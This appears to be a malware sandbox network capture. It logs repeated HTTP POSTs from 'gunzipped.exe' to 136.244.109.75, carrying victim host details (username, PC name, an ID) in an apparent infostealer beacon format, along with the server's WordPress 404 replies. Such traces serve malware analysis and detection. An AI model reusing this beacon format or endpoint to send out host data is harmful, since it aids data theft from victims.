2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:46.054367065 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:46.054404974 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:46.054442883 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:46.054491997 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:46.054536104 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:46.054575920 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:46.054615021 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:46.054656029 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:46.054694891 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49789	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:46.390927076 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:46.594094038 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:47.542049885 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:46 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:47.542165041 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:47.542186975 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:47.542207003 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:47.542248011 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:47.542285919 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:47.542324066 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:47.542360067 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:47.542396069 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:47.542439938 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49790	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:47.882152081 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:48.089839935 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:49.029202938 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:47 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:49.029257059 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:49.029294968 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
